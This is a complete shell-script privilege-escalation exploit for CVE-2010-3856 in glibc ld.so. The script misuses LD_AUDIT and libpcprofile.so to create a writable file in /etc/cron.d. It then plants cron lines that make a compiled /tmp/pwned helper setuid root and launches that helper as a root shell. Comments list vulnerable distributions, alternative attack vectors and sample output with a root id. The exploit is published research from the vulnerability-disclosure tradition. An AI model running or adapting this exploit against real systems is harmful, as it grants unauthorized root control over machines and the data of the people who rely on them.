#!/bin/sh

#
# $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $
#
# raptor_ldaudit - privilege escalation through glibc ld.so
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment 
# variable to reference dynamic shared objects (DSOs) as audit objects, which 
# allows local users to gain privileges by leveraging an unsafe DSO located in 
# a trusted library directory, as demonstrated by libpcprofile.so 
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at 
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more...
#
# Usage:
# $ chmod +x raptor_ldaudit
# $ ./raptor_ldaudit
# [...]
# Everything looks fine. Just wait for it... LEGEN-DARY!
# -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1# 
# [don't forget to delete /tmp/pwned*!]
# 
# Vulnerable platforms:
# Slackware 13.1	[tested, weird loop in dillon's cron but it works]
# openSUSE 11.3		[untested]
# Fedora Core 13	[untested]
# RHEL/CentOS 5		[untested]
# Ubuntu 10		[untested]
# [...]
#

echo "raptor_ldaudit - privilege escalation through glibc ld.so"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo

# prepare setuid shell helper to circumvent bash checks
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
	echo "Error: Problems compiling setuid shell helper, check your gcc."
	exit 1
fi

# do the magic!
runme="/etc/cron.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "Error: Not vulnerable or wrong attack vector? See comments."
	exit 1
fi

# build the cron script (vixie's crontab)
echo -n > $runme
echo "* * * * *   root   chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# build the cron script (dillon's crontab)
echo "* * * * *   chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme

# legen -- wait for it -- dary!
echo -n "Everything looks fine. Just wait for it... "
sleep 70
echo "LEGEN-DARY!"
ls -l /tmp/pwned
/tmp/pwned
